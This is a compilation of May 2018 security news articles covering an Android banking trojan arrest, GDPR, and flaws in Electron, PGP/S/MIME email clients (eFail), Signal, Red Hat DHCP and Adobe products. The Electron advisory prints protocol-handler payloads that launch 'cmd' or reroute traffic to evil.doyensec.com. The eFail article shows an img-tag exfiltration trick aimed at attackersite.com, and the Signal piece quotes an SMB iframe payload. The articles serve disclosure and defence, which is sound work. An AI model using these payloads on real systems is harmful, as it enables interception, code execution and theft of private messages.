The malicious app, distributed via spam emails since 2016, instructed users to enter their card details, which were then sent to a server controlled by the attackers. The cybercrooks transferred between $1,500 and $8,000 per day from victims’ bank accounts, $200-$500 at a time. The criminal proceeds were laundered using cryptocurrencies.

The malware also helped the attackers intercept the SMS confirmation codes sent by banks, at the same time blocking all text messages confirming transactions in an effort to avoid raising suspicion.

While Russia has occasionally collaborated with Western law enforcement agencies to bring down global cybercrime operations, it has often turned a blind eye to the activities of hackers who have mainly targeted the United States.

Four Russian nationals are currently on the FBI’s Cyber Most Wanted list, including the alleged administrator of a massive cybercrime scheme involving the Zeus Trojan, and three people believed to have been involved in attacks on Yahoo that resulted in roughly 500 million accounts getting compromised.

The Russian government has defended some of the alleged hackers arrested by the United States – in one case Moscow accused Washington of abducting the son of a lawmaker.

On the other hand, the government has been known to crack down on cybercrime rings that target Russian citizens. Police have arrested 50 hackers believed to have used the Lurk Trojan, the creator of the Svpeng Android malware, and nine people who allegedly stole $17 million from bank accounts.


EU's New Data Protection Rules Come Into Effect
25.5.2018 securityweek  BigBrothers

The European Union's new data protection laws came into effect on Friday, with Brussels saying the changes will protect consumers from being like "people naked in an aquarium".

The EU's so-called General Data Protection Regulation (GDPR) has been blamed for a flood of spam emails and messages in recent weeks as firms rush to request the explicit consent of users to contact them.

Even though the rules were officially adopted two years ago, with a grace period until now to adapt to them, companies have been slow to act, resulting in a last-minute scramble this week.

Britain's data protection watchdog, the Information Commissioner's Office (ICO), said that its site had experienced "a few interruptions" as the deadline loomed, but said that "everything is working now".

Brussels insists that the laws will become a global benchmark for the protection of people's online information, particularly in the wake of the Facebook data harvesting scandal.

"The new rules will put the Europeans back in control of their data," said EU Justice Commissioner Vera Jourova.

"When it comes to personal data today, people are naked in an aquarium."

Companies can be fined up to 20 million euros ($24 million) or four percent of annual global turnover for breaching the strict new data rules for the EU, a market of 500 million people.

- Explicit consent -

The law establishes the key principle that individuals must explicitly grant permission for their data to be used.

The new EU law also establishes consumers' "right to know" who is processing their information and what it will be used for.

People will be able to block the processing of their data for commercial reasons and even have data deleted under the "right to be forgotten".

Parents will decide for children until they reach the age of consent, which member states will set anywhere between 13 and 16 years old.

The case for the new rules has been boosted by the recent scandal over the harvesting of Facebook users' data by Cambridge Analytica, a US-British political research firm, for the 2016 US presidential election.

The breach affected 87 million users, but Facebook said Wednesday it has found no evidence that any data from Europeans were sold to Cambridge Analytica.

Facebook chief Mark Zuckerberg said in a hearing at the European Parliament on Tuesday that his firm will not only be "fully compliant" with the EU law, but will also make huge investments to protect users.

Zuckerberg said he was "sorry" for the Cambridge Analytica breaches, but also for its failure to crack down on election interference, "fake news" and other data misuses.

- 'Global standard'

Big platforms like Facebook, WhatsApp and Twitter seem well prepared for the new laws, while smaller businesses have voiced concern.

But EU officials say they are initially focusing on the big firms, whose business models use a goldmine of personal information for advertising, while offering smaller firms more time to adapt.

Meanwhile Brussels has expressed impatience with the eight countries -- out of the EU's 28 -- that say they will not have updated their laws by Friday.

EU Commissioner Jourova said the new rules are setting "a global standard of privacy".

Many Americans who once criticised Europe as too quick to regulate the new driver of the global economy now see the need for the GDPR, EU officials insist.

"I see some version of GDPR getting quickly adopted at least in the United States," Param Vir Singh, a business professor at Carnegie Mellon University, told AFP in an email.

Japan, South Korea, India and Thailand are also drawing "some inspiration" from Brussels as they debate or adopt similar laws, another EU official said.


Flaw in Schneider PLC Programming Tool Allows Remote Attacks
25.5.2018 securityweek 
Vulnerebility

Schneider Electric this week announced that an update for its EcoStruxure Machine Expert product patches a high severity vulnerability that can be exploited remotely to obtain sensitive data.

EcoStruxure Machine Expert - Basic, formerly known as SoMachine Basic, is a lightweight tool designed for programming Schneider’s Modicon M221 programmable logic controller (PLC).

Gjoko Krstic, a researcher at industrial cybersecurity firm Applied Risk, discovered recently that SoMachine Basic 1.6.0 build 61653, 1.5.5 SP1 build 60148, and likely earlier versions are impacted by an XML external entity (XXE) vulnerability that can be exploited to launch an out-of-band (OOB) attack.

Tracked as CVE-2018-7783, the vulnerability can be exploited by a remote and unauthenticated attacker to read arbitrary files on the targeted system. These files can include sensitive information, including passwords, user data, and details about the system.

For the attack to work, the hacker needs to convince the targeted user to open a specially crafted SoMachine Basic project or template file.

“The vulnerability is triggered when input passed to the XML parser is not sanitized while parsing the XML project and/or template file,” Krstic wrote in an advisory.

The researcher also pointed out that in certain circumstances the flaw can also be exploited for arbitrary code execution and to cause a denial-of-service (DoS) condition.

Schneider Electric patched the vulnerability with the release of SoMachine Basic v1.6 SP1.

Last month, at SecurityWeek’s ICS Cyber Security Conference in Singapore, Krstic disclosed the details of a DoS vulnerability that affects safety controllers from several major vendors, including devices that are directly exposed to the Internet.

In January, Schneider Electric informed customers that its Floating License Manager, a tool that helps organizations manage licenses for Schneider products, contained code execution, open redirect and DoS vulnerabilities due to the use of a third-party component named Flexera FlexNet Publisher. The security holes were discovered in FlexNet Publisher in 2016 and 2017.

One week ago, Schneider published another advisory to inform customers that these flaws also impact PlantStruxure PES. ICS-CERT has also published an advisory on Thursday for the Floating License Manager issues.


Electron Windows Protocol Handler MITM/RCE (bypass for CVE-2018-1000006 fix)
25.5.2018 securityaffairs
Vulnerebility  

As part of an engagement for one of our clients, we analyzed the patch for the recent Electron Windows Protocol handler RCE bug (CVE-2018-1000006) and identified a bypass.
Under certain circumstances, this bypass leads to session hijacking and remote code execution. The vulnerability is triggered by simply visiting a web page through a browser. Electron apps designed to run on Windows that register themselves as the default handler for a protocol and do not prepend dash-dash in the registry entry are affected.

We reported the issue to the Electron core team (via security@electronjs.org) on May 14, 2018, and received immediate notification that they were already working on a patch. The issue was also reported by Google’s Nicolas Ruff a few days earlier.

CVE-2018-1000006
On January 22, 2018, Electron released a patch for v1.7.11, v1.6.16 and v1.8.2-beta4 for a critical vulnerability known as CVE-2018-1000006 (surprisingly no fancy name here) affecting Electron-based applications running on Windows that register custom protocol handlers.

The original issue was extensively discussed in many blog posts, and can be summarized as the ability to use custom protocol handlers (e.g. myapp://) from a remote web page to piggyback command line arguments and insert a new switch that Electron/Chromium/Node would recognize and execute while launching the application.

<script>
win.location = 'myapp://foobar" --gpu-launcher="cmd c/ start calc" --foobar='
</script>
Interestingly, on January 31, 2018, Electron v1.7.12, v1.6.17 and v1.8.2-beta5 were released. It turned out that the initial patch did not take into account uppercase characters and led to a bypass in the previous patch with:

<script>
win.location = 'myapp://foobar" --GPU-launcher="cmd c/ start calc" --foobar='
</script>
Understanding the patch
The patch for CVE-2018-1000006 is implemented in electron/atom/app/command_line_args.cc and consists of a validation mechanism which ensures users won’t be able to include Electron/Chromium/Node arguments after an url (the specific protocol handler). Bear in mind some locally executed applications do require the ability to pass custom arguments.

bool CheckCommandLineArguments(int argc, base::CommandLine::CharType** argv) {
DCHECK(std::is_sorted(std::begin(kBlacklist), std::end(kBlacklist),
[](const char* a, const char* b) {
return base::StringPiece(a) < base::StringPiece(b);
}))
<< "The kBlacklist must be in sorted order";
DCHECK(std::binary_search(std::begin(kBlacklist), std::end(kBlacklist),
base::StringPiece("inspect")))
<< "Remember to add Node command line flags to kBlacklist";

const base::CommandLine::StringType dashdash(2, '-');
bool block_blacklisted_args = false;
for (int i = 0; i < argc; ++i) {
if (argv[i] == dashdash)
break;
if (block_blacklisted_args) {
if (IsBlacklistedArg(argv[i]))
return false;
} else if (IsUrlArg(argv[i])) {
block_blacklisted_args = true;
}
}
return true;
}
As is commonly seen, blacklist-based validation is prone to errors and omissions especially in complex execution environments such as Electron:

The patch relies on a static blacklist of available chromium flags. On each libchromiumcontent update the Electron team must remember to update the command_line_args.cc file in order to make sure the blacklist is aligned with the current implementation of Chromium/v8
The blacklist is implemented using a binary search. Valid flags could be missed by the check if the list is not properly sorted
Bypass and security implications
We started looking for missed flags and noticed that host-rules were absent from the blacklist. With this flag, one may specify a set of rules to rewrite domain names for requests issued by libchroumiumcontent. This immediately sticks out as a good candidate for subverting the process.

In fact, an attacker can exploit this issue by overriding the host definitions in order to perform completely transparent Man-In-The-Middle:

<!doctype html>
<script>
window.location = 'skype://user?userinfo" --host-rules="MAP * evil.doyensec.com" --foobar='
</script>
When a user visits a web page in a browser containing the preceding code, the Skype app will be launched and all Chromium traffic will be forwarded to evil.doyensec.com instead of the original domain. Since the connection is made to the attacker-controlled host, certificate validation does not help as demonstrated in the following video:

https://blog.doyensec.com/public/images/skypeelectronbugpoc.mp4

We analyzed the impact of this vulnerability on popular Electron-based apps and developed working proofs-of-concept for both MITM and RCE attacks. While the immediate implication is that an attacker can obtain confidential data (e.g. oOAuthtokens), this issue can be also abused to inject malicious HTML responses containing XSS -> RCE payloads. With
nodeIntegration
enabled, this is simply achieved by leveraging Node’s APIs. When encountering application sandboxing via nodeIntegration: false or sandbox, it is necessary to chain this with other bugs (e.g. nodeIntegration bypass or IPC abuses).

Please note it is only possible to intercept traffic generated by Chromium, and not Node. For this reason, Electron’s update feature, along with other critical functions, are not affected by this vulnerability.

Future
On May 16, 2018, Electron released a new update containing an improved version of the blacklist for v2.0.1, v1.8.7, and v1.7.15. The team is actively working on a more resilient solution to prevent further bypasses. Considering that the API change may potentially break existing apps, it makes sense to see this security improvement within a major release.

In the meantime, Electron application developers are recommended to enforce a dash-dash notation in
setAsDefaultProtocolClient

app.setAsDefaultProtocolClient(protocol, process.execPath, [
'--your-switches-here',
'--'
])
or in the Windows protocol handler registry entry

secure Windows protocol handler

As a final remark, we would like to thank the entire Electron team for their work on moving to a secure-by-default framework. Electron contributors are tasked with the non-trivial mission of closing the web-native desktop gap. Modern browsers are enforcing numerous security mechanisms to ensure isolation between sites, facilitate web security protections and prevent untrusted remote content from compromising the security of the host. When working with Electron, things get even more complicated.


Russian speaking hacker arrested for stealing $8,000 per day leveraging mobile malware
25.5.2018 securityaffairs  
Virus

Moscow, May 24, 2018 – law enforcement, with support from Group-IB, has arrested a 32-year-old hacker, accused of stealing funds from Russian banks’ customers using Android mobile malware.
At the height of their activity, victims reportedly lost between 1,500 to 8,000 dollars daily and levered cryptocurrency for laundering.

Group-IB’s analysis reviewed the tools and techniques leveraged in the group’s attack revealing that the gang tricked customers of Russian banks into downloading malicious mobile applications “Banks at your fingertips”. The app claimed to be an aggregator of the country’s leading mobile banking systems and promised users a ‘one-click’ access to all bank cards to view balances, transfer money from card to card, and pay for online services. The app was first discovered in 2016 and was distributed through spam emails.

The criminal group’s approach was rather elementary: customers of banks downloaded the fake mobile app and entered their card details. The Trojan then sent bank card data or online banking credentials to the C&C server. Following this, the threat actor transferred 200-500 dollars at a time to previously activated bank accounts, and bypassed SMS confirmation codes which were intercepted from the victim’s phone. The victims were not aware of the transactions as all SMS confirmations of transactions were blocked.

The investigation by authorities identified a member of the criminal group, who was responsible for transferring money from user accounts to attacker’s cards, a 32-year-old unemployed Russian national who had previous convictions connected to arms trafficking. During the suspect’s arrest in May 2018, authorities identified SIM cards and fraudulent bank cards to which stolen funds were transferred. The suspect has confessed to his actions and the investigation/ prosecution continues.

mobile malware

Seems, we need to keep our mobiles safe. Well, this is not the first case of stealing. We’ve seen many cases in the past too. One of the cases happened on March 2018 – in which a malware campaign that attempted to install a resource-draining currency miner on more than 400,000 computers in 12 hours was caused by a malicious backdoor that was sneaked into a BitTorrent application called Mediaget, a Microsoft researcher said. Researchers called it a supply-chain attack, which aims to infect large numbers of people by compromising a popular piece of hardware or software.

Many people have a question about torrenting. Millions of the people don’t know whether torrenting is legal or illegal. Well, torrenting carries risks. Authorities will catch and punish you if you torrent copyright material. Also, there is a risk of downloading infected files. All you need is the best tool or any software that will keep you safe from this kind of threats.

I have reached Sergey Lupanin, Head of cyber investigation department, Group-IB for a comment:

“Actually this trojan is quite simple and private, means there is no any descriptions or screenshots on Dark-web forums. And it’s early versions didn’t interact with any mobile banks services. Users entered their card data and permitted this application to work with SMS-messages.

Trojan used https protocol with a self-signed certificate to work with C2 servers and sent user’s card data to the actor. The actor entered this data (which included card number, cvv code, expiration date, and owner name) to card2card service. User received SMS with transaction authorization code, that was intercepted by this application and sent to Actor for transaction approval. And that’s it. Later this trojan received addition functionality – ability to work with mobile banks via SMS, thus not requiring from Threat actor to use any Card2Card service.”


Nethammer—Exploiting DRAM Rowhammer Bug Through Network Requests
25.5.2018 thehackernews  
Exploit
Last week, we reported about the first network-based remote Rowhammer attack, dubbed Throwhammer, which involves the exploitation a known vulnerability in DRAM through network cards using remote direct memory access (RDMA) channels.
However, a separate team of security researchers has now demonstrated a second network-based remote Rowhammer technique that can be used to attack systems using uncached memory or flush instruction while processing the network requests.
The research was carried out by researchers who discovered Meltdown and Spectre CPU vulnerabilities, which is independent of the Amsterdam researchers who presented a series of Rowhammer attacks, including Throwhammer published last week.
If you are unaware, Rowhammer is a critical issue with recent generation dynamic random access memory (DRAM) chips in which repeatedly accessing a row of memory can cause "bit flipping" in an adjacent row, allowing attackers to change the contents of the memory.
The issue has since been exploited in a number of ways to escalate an attacker's privilege to kernel level and achieve remote code execution on the vulnerable systems, but the attacker needed access to the victim’s machine.
However, the new Rowhammer attack technique, dubbed Nethammer, can be used to execute arbitrary code on the targeted system by rapidly writing and rewriting memory used for packet processing, which would be possible only with a fast network connection between the attacker and victim.
This causes a high number of memory accesses to the same set of memory locations, which eventually induces disturbance errors in DRAM and causes memory corruption by unintentionally flipping the DRAM bit-value.
The resulting data corruption can then be manipulated by the attacker to gain control over the victim's system.
"To mount a Rowhammer attack, memory accesses need to be directly served by the main memory. Thus, an attacker needs to make sure that the data is not stored in the cache," the researcher paper [PDF] reads.
Since caching makes an attack difficult, the researchers developed ways that allowed them to bypass the cache and attack directly into the DRAM to cause the row conflicts in the memory cells required for the Rowhammer attack.
Researchers tested Nethammer for the three cache-bypass techniques:
A kernel driver that flushes (and reloads) an address whenever a packet is received.
Intel Xeon CPUs with Intel CAT for fast cache eviction
Uncached memory on an ARM-based mobile device.
All three scenarios are possible, researchers showed.
In their experimental setup, researchers were successfully able to induce a bit flip every 350 ms by sending a stream of UDP packets with up to 500 Mbit/s to the target system.
Since the Nethammer attack technique does not require any attack code in contrast to a regular Rowhammer attack, for example, no attacker-controlled code on the system, most countermeasures do not prevent this attack.
Since Rowhammer exploits a computer hardware weakness, no software patch can completely fix the issue. Researchers believe the Rowhammer threat is not only real but also has potential to cause real, severe damage.
For more in-depth details on the new attack technique, you can head on to this paper, titled "Nethammer: Inducing Rowhammer Faults through Network Requests," published by the researchers earlier this week.


Critical Flaws in PGP and S/MIME Tools Can Reveal Encrypted Emails in Plaintext
25.5.2018 thehackernews 
Vulnerebility
Note—the technical details of the vulnerabilities introduced in this article has now been released, so you should also read our latest article to learn how the eFail attack works and what users can do to prevent themselves.
An important warning for people using widely used email encryption tools—PGP and S/MIME—for sensitive communication.
A team of European security researchers has released a warning about a set of critical vulnerabilities discovered in PGP and S/Mime encryption tools that could reveal your encrypted emails in plaintext.
What's worse? The vulnerabilities also impact encrypted emails you sent in the past.
PGP, or Pretty Good Privacy, is an open source end-to-end encryption standard used to encrypt emails in a way that no one, not even the company, government, or cyber criminals, can spy on your communication.
S/MIME, Secure/Multipurpose Internet Mail Extensions, is an asymmetric cryptography-based technology that allows users to send digitally signed and encrypted emails.
Sebastian Schinzel, computer security professor at Münster University of Applied Sciences, headed on to Twitter to warn users of the issue, and said that "there are currently no reliable fixes for the vulnerability."
Electronic Frontier Foundation (EFF) has also confirmed the existence of “undisclosed” vulnerabilities and recommended users to uninstall PGP and S/MIME applications until the flaws are patched.
"EFF has been in communication with the research team, and can confirm that these vulnerabilities pose an immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages," the organisation said in its blog post.
"Our advice, which mirrors that of the researchers, is to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email."
So, until the vulnerabilities are patched, users are advised to stop sending and especially reading PGP-encrypted emails for now, and use alternative end-to-end secure tools, such as Signal.
EFF has warned users to immediately disable if they have installed any of the following mentioned plugins/tools for managing encrypted emails:
Thunderbird with Enigmail
Apple Mail with GPGTools
Outlook with Gpg4win
It should be noted that researchers have not claimed that the flaws reside in the way encryption algorithm works; instead, the issues appear in the way email decryption tools/plugins work.
The full technical details of the vulnerabilities will be released in a paper on Tuesday at 7 am UTC (3 am Eastern, midnight Pacific time).
Stay Tuned to The Hacker News for further details on the vulnerabilities.


Simple bug could lead to RCE flaw on apps built with Electron Framework
25.5.2018 thehackernews 
Vulnerebility
A critical remote code execution vulnerability has been discovered in the popular Electron web application framework that could allow attackers to execute malicious code on victims' computers.
Electron is an open source app development framework that powers thousands of widely-used desktop applications including WhatsApp, Skype, Signal, Wordpress, Slack, GitHub Desktop, Atom, Visual Studio Code, and Discord.
Besides its own modules, Electron framework also allows developers to create hybrid desktop applications by integrating Chromium and Node.js framework through APIs.
Since Node.js is a robust framework for server-side applications, having access to its APIs indirectly gives Electron-based apps more control over the operating system installed on the server.
To prevent unauthorised or unnecessary access to Node.js APIs, Electron framework by default sets the value of "webviewTag" to false in its "webPreferences" configuration file, which then sets "nodeIngration" to false.
This configuration file with the hardcoded values of some parameters was introduced in the framework to prevent real-time modifications by malicious functions, i.e., by exploiting a security vulnerability like cross-site scripting (XSS).
Moreover, if an app developer skips or forgets to declare "webviewTag: false" in the configuration file, even then the framework by default considers the value of "nodeIntegration" as false, to take a preventive measure.

However, Trustwave researcher Brendan Scarvell has released proof-of-concept (PoC) code that attackers can inject into targeted applications running without "webviewTag" declared, by exploiting a cross-site scripting flaw, to achieve remote code execution.
The exploit re-enables "nodeIntegration" in runtime, allowing attackers to gain unauthorised control over the application server and execute arbitrary system commands.
It should be noted that the exploit would not work if the developer has also opted for one of the following options:
nativeWindowOption option enabled in its webPreferences.
Intercepting new-window events and overriding event.newGuest without using the supplied options tag.
The vulnerability, tracked as CVE-2018-1000136, was reported to the Electron team by Scarvell earlier this year and affected all versions of Electron at the time of discovery.
Electron developers patched the vulnerability in March 2018 with the release of versions 1.7.13, 1.8.4, and 2.0.0-beta.4.
So, app developers should ensure their applications are patched, or at least not vulnerable to this issue.
For more technical details on the Electron vulnerability and PoC exploit code, you can head on to the Trustwave's blog post.
It should also be noted that the Electron bug has nothing to do with the recently discovered flaw in Signal app, which has also recently patched a critical cross-site scripting vulnerability that leads to remote code execution, whose full technical details are scheduled to be published exclusively on The Hacker News this evening. Stay Tuned!


Here's How eFail Attack Works Against PGP and S/MIME Encrypted Emails
25.5.2018 thehackernews  Krypto
With a heavy heart, security researchers have early released the details of a set of vulnerabilities discovered in email clients for two widely used email encryption standards—PGP and S/MIME—after someone leaked their paper on the Internet, which was actually scheduled for tomorrow.
PGP and S/MIME are popular end-to-end encryption standards used to encrypt emails in a way that no one, not even the company, government, or cyber criminals, can spy on your communication.
Before explaining how the vulnerability works, it should be noted that the flaw doesn't reside in the email encryption standards itself; instead, it affects a few email clients/plugins that incorrectly implemented the technologies.


Dubbed eFail by the researchers, the vulnerabilities, as described in our previous early-warning article, could allow potential attackers to decrypt the content of your end-to-end encrypted emails in plaintext, even for messages sent in the past.
According to the paper released by a team of European security researchers, the vulnerabilities exist in the way encrypted email clients handle HTML emails and external resources, like loading of images, styles from external URLs.
Here's How the eFail Attack Works:

Email clients are usually configured to automatically decrypt the content of encrypted emails you receive, but if your client is also configured to load external resources automatically, attackers can abuse this behavior to steal messages in plaintext just by sending you a modified version of the same encrypted email content.
The attack vector requires injected plaintext into the encrypted mail, and then using the exploit, it will exfiltrate the originally encrypted data as soon as any recipient's mail client accesses (or decrypts) the message
It should be noted that to perform an eFail attack, an attacker must have access to your encrypted emails, which is then modified in the following way and send back to you in order to trick your email client into revealing the secret message to the remote attacker without alerting you.


As described in the proof-of-concept attack released by the researchers, the attacker uses one of the encrypted messages you are supposed to receive or might have already received and then turns it into a multipart HTML email message, as well as forges the return address, so it appears to come from the original sender.
In the newly composed email, the attacker adds an unclosed image tag, like this <img src="https://attackersite.com/ just before the encrypted content and ends it by adding the end of the image tag, like this: .jpg">, as clearly shown in the screenshot.
When your vulnerable email client receives this message, it decrypts the encrypted part of the message given in the middle, and then automatically tries to render the HTML content, i.e., the image tag with all the decrypted text as the new name of the image, as shown below.

Since your email client will try to load the image from the attacker-controlled server, the attacker can capture this incoming request, where the filename contains the full content of the original encrypted email in plaintext.
Although PGP has been designed to show you a warning note if the integrity of your email is compromised, a few email clients do not display these warnings, allowing any potential attackers to perform eFail attacks successfully.
How To Prevent Against eFail Attacks

Generally, it is a very tough job for an advisory to even intercept your encrypted emails, but for people desperately using email encryption always attract well-resourced and sophisticated attackers.
Ditching the use of PGP or S/MIME to prevent eFail attacks would be stupid advice, as it is quite easy to mitigate the reported issues.
Users can switch to a good email client that always shows a warning when the integrity of the emails is compromised and doesn't render HTML emails by default to prevent loading of external resources automatically.
Researchers also advise users to adopt an authenticated encryption algorithm for sensitive communication.
The research was conducted by a team of researchers, including Damian Poddebniak, Christian Dresen, Fabian Ising, and Sebastian Schinzel from Munster University of Applied Sciences; Jens Müller, Juraj Somorovsky, and Jörg Schwenk from Ruhr University Bochum; and Simon Friedberger from KU Leuven.
For more in-depth details on the attack technique, you can head on to this informational page about the eFail attack and the paper [PDF] titled, "Efail: Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels," published by the researchers.


Adobe Releases Critical Security Updates for Acrobat, Reader and Photoshop CC
25.5.2018 thehackernews 
Vulnerebility
Adobe has just released new versions of its Acrobat DC, Reader and Photoshop CC for Windows and macOS users that patch 48 vulnerabilities in its software.
A total of 47 vulnerabilities affect Adobe Acrobat and Reader applications, and one critical remote code execution flaw has been patched in Adobe Photoshop CC.
Out of 47, Adobe Acrobat and Reader affect with 24 critical vulnerabilities—categorized as Double Free, Heap Overflow, Use-after-free, Out-of-bounds write, Type Confusion, and Untrusted pointer dereference—which if exploited, could allow arbitrary code execution in the context of the targeted user.
Rest of the 23 flaws, including Security Bypass, Out-of-bounds read, Memory Corruption, NTLM SSO hash theft, and HTTP POST newline injection via XFA submission, are marked as important and can lead to information disclosure or security bypass.



adobe The above-listed vulnerabilities impact the Windows and macOS versions of Acrobat DC (Consumer and Classic 2015), Acrobat Reader DC (Consumer and Classic 2015), Acrobat 2017, and Acrobat Reader 2017.
The latest Adobe Acrobat and Reader patches have been given a priority rating of "1," which means the flaws are either being exploited in the wild or more likely to be exploited in the wild. So, users are highly recommended to update their software as soon as possible.
The flaws have been addressed in Acrobat DC and Acrobat Reader DC version 2018.011.20040, Acrobat 2017 and Acrobat Reader DC 2017 version 2017.011.30080, as well as Acrobat Reader DC (Classic 2015) and Acrobat DC (Classic 2015) version 2015.006.30418.
Security Patch for Adobe Photoshop CC
Adobe has also released security patches for the Windows and macOS versions of Photoshop CC to address a critical vulnerability, categorized as "out-of-bounds write" issue, which can be exploited to execute arbitrary code in the context of the current user.
The vulnerability (CVE-2018-4946) impacts Photoshop CC 2018 version 19.1.3 and earlier 19.x versions, as well as Photoshop CC 2017 version 18.1.3 and earlier 18.x versions.
The company credited researcher Giwan Go of Trend Micro's Zero Day Initiative for reporting the flaw, which has been addressed with the release of Photoshop CC 2018 version 19.1.4 and Photoshop CC 2017 version 18.1.4.
This update has been given a priority rating of "3," which means the attackers have not targeted the vulnerability.
Adobe recommends end users and administrators to install the latest security updates as soon as possible


Hackers Reveal How Code Injection Attack Works in Signal Messaging App
25.5.2018 thehackernews 
Vulnerebility
After the revelation of the eFail attack details, it's time to reveal how the recently reported code injection vulnerability in the popular end-to-end encrypted Signal messaging app works.
As we reported last weekend, Signal has patched its messaging app for Windows and Linux that suffered a code injection vulnerability discovered and reported by a team of white-hat hackers from Argentina.
The vulnerability could have been exploited by remote attackers to inject a malicious payload inside the Signal desktop app running on the recipients' system just by sending them a specially crafted link—without requiring any user interaction.
According to a blog post published today, the vulnerability was accidentally discovered while researchers–Iván Ariel Barrera Oro, Alfredo Ortega and Juliano Rizzo–were chatting on Signal messenger and one of them shared a link of a vulnerable site with an XSS payload in its URL.
However, the XSS payload unexpectedly got executed on the Signal desktop app.

XSS, also known as cross-site scripting, is a common attack vector that allows attackers to inject malicious code into a vulnerable web application.
After analyzing the scope of this issue by testing multiple XSS payloads, researchers found that the vulnerability resides in the function responsible for handling shared links, allowing attackers to inject user-defined HTML/JavaScript code via iFrame, image, video and audio tags.
Using this vulnerability, attackers can even inject a form on the recipient's chat window, tricking them to reveal their sensitive information using social engineering attacks.
It had previously been speculated that the Signal flaw might have allowed attackers to execute system commands or gain sensitive information like decryption keys—but no, it is not the case.
The vulnerability was immediately patched by the Signal developers shortly after the proof-of-concept video was released by Ortega last weekend.

The researchers also found that a patch (regex function to validate URLs) for this vulnerability existed in previous versions of the desktop app, but it was somehow removed or skipped in the Signal update released on 10th April this year.
Now, after knowing full details of the vulnerability, it seems that the issue is not a critical or dangerous one, as speculated.
So you can freely rely on Signal for encrypted communication without any worries. Just make sure the service is always up-to-date.


Red Hat Linux DHCP Client Found Vulnerable to Command Injection Attacks
25.5.2018 thehackernews 
Vulnerebility
A Google security researcher has discovered a critical remote command injection vulnerability in the DHCP client implementation of Red Hat Linux and its derivatives like Fedora operating system.
The vulnerability, tracked as CVE-2018-1111, could allow attackers to execute arbitrary commands with root privileges on targeted systems.
Whenever your system joins a network, it’s the DHCP client application which allows your system to automatically receive network configuration parameters, such as an IP address and DNS servers, from the DHCP (Dynamic Host Control Protocol) server.
The vulnerability resides in the NetworkManager integration script included in the DHCP client packages which is configured to obtain network configuration using the DHCP protocol.
Felix Wilhelm from the Google security team found that attackers with a malicious DHCP server, or connected to the same network as the victim, can exploit this flaw by spoofing DHCP responses, eventually allowing them to run arbitrary commands with root privileges on the victim's system running vulnerable DHCP client.
Although full details of the vulnerability have not been released, Wilhelm claims his PoC exploit code is so short in length that it even can fit in a tweet.
Meanwhile, Barkın Kılıç, a security researcher from Turkey, has released a tweetable proof-of-concept exploit code for the Red Hat Linux DHCP client vulnerability on Twitter.

In its security advisory, Red Hat has confirmed that the vulnerability impacts Red Hat Enterprise Linux 6 and 7, and that all of its customers running affection versions of the dhclient package should update their packages to the newer versions as soon as they are available.
"Users have the option to remove or disable the vulnerable script, but this will prevent certain configuration parameters provided by the DHCP server from being configured on a local system, such as addresses of the local NTP or NIS servers," Red Hat warns.
Fedora has also released new versions of DHCP packages containing fixes for Fedora 26, 27, and 28.
Other popular Linux distributions like OpenSUSE and Ubuntu do not appear to be impacted by the vulnerability, as their DHCP client implementation doesn't have NetworkManager integration script by default.


Another severe flaw in Signal desktop app lets hackers steal your chats in plaintext
25.5.2018 thehackernews 
Vulnerebility
For the second time in less than a week, users of the popular end-to-end encrypted Signal messaging app have to update their desktop applications once again to patch another severe code injection vulnerability.
Discovered Monday by the same team of security researchers, the newly discovered vulnerability poses the same threat as the previous one, allowing remote attackers to inject malicious code on the recipients' Signal desktop app just by sending them a message—without requiring any user interaction.
To understand more about the first code injection vulnerability (CVE-2018-10994), you can read our previous article covering how researchers find the Signal flaw and how it works.
The only difference between the two is that the previous flaw resides in the function that handles links shared in the chat, whereas the new vulnerability (CVE-2018-11101) exists in a different function that handles the validation of quoted messages, i.e., quoting a previous message in a reply.

In other words, to exploit the newly patched bug on vulnerable versions of Signal desktop app, all an attacker needs to do is send a malicious HTML/javascript code as a message to the victim, and then quote/reply to that same message with any random text.
If the victim receives this quoted message containing the malicious payload on its vulnerable Signal desktop app, it will automatically execute the payload, without requiring any user interaction.
Exploiting Signal Code Injection to Steal Plaintext Chats

Until now the proof-of-concept payloads used to demonstrate code injection vulnerabilities in Signal were limited to embedding an HTML iFrame, or image/video/audio tags onto the victim's desktop app.
However, researchers have now managed to craft a new PoC exploit that could allow remote attackers to successfully steal all Signal conversations of the victims in the plaintext just by sending them a message.
This hack literally defeats the purpose of an end-to-end encrypted messaging app, allowing remote attackers to easily get the hold on users' plain-text conversations without breaking the encryption.
Attackers Could Possibly Steal Windows Password As Well
What's worse?
In their blog post, the researchers also indicated that an attacker could even include files from a remote SMB share using an HTML iFrame, which can be abused to steal NTLMv2 hashed password for Windows users.
"In the Windows operative system, the CSP fails to prevent remote inclusion of resources via the SMB protocol. In this case, remote execution of JavaScript can be achieved by referencing the script in an SMB share as the source of an iframe tag, for example: <iframe src=\\DESKTOP-XXXXX\Temp\test.html> and then replying to it," the researchers explain.
Though they haven't claimed anything about this form of attack, I speculate that if an attacker can exploit code injection to force Windows OS to initiate an automatic authentication with the attacker-controlled SMB server using single sign-on, it would eventually hand over victim's username, and NTLMv2 hashed password to the attackers, potentially allowing them to gain access to the victim's system.
We have seen how the same attack technique was recently exploited using a vulnerability in Microsoft Outlook, disclosed last month.
I can not verify this claim at this moment, but we are in contact with few security researchers to confirm this.
Researchers—Iván Ariel Barrera Oro, Alfredo Ortega, Juliano Rizzo, and Matt Bryant—responsibly reported the vulnerability to Signal, and its developers have patched the vulnerability with the release of Signal desktop version 1.11.0 for Windows, macOS, and Linux users.
However, The Hacker News has learned that Signal developers had already identified this issue as part of a comprehensive fix to the first vulnerability before the researchers found it and reported them.
Signal app has an auto-update mechanism, so most users must have the update already installed. You can read this guide to ensure if you are running updated version of Signal.
And if you don’t, you should immediately update your Signal for desktop as soon as possible, since now the vulnerability poses a severe risk of getting your secret conversations exposed in plaintext to attackers and further severe consequences.


New Features Added to CERT Tapioca Tool
25.5.2018 securityweek  Safety

The CERT Coordination Center (CERT/CC) at Carnegie Mellon University this week announced the launch of a new version of the network traffic analysis tool CERT Tapioca.

CERT Tapioca was first released in 2014 as a network-layer man-in-the-middle (MITM) proxy virtual machine designed for identifying apps that fail to validate certificates and investigating the content of HTTP and HTTPS traffic.

CERT Tapioca has been used to identify Android applications that fail to properly validate SSL certificates and expose users to MitM attacks. More than one million apps have been checked and over 23,000 of them failed dynamic testing.

The tool can be used to analyze network traffic not only on smartphones, but also on IoT devices, computers and VMs.

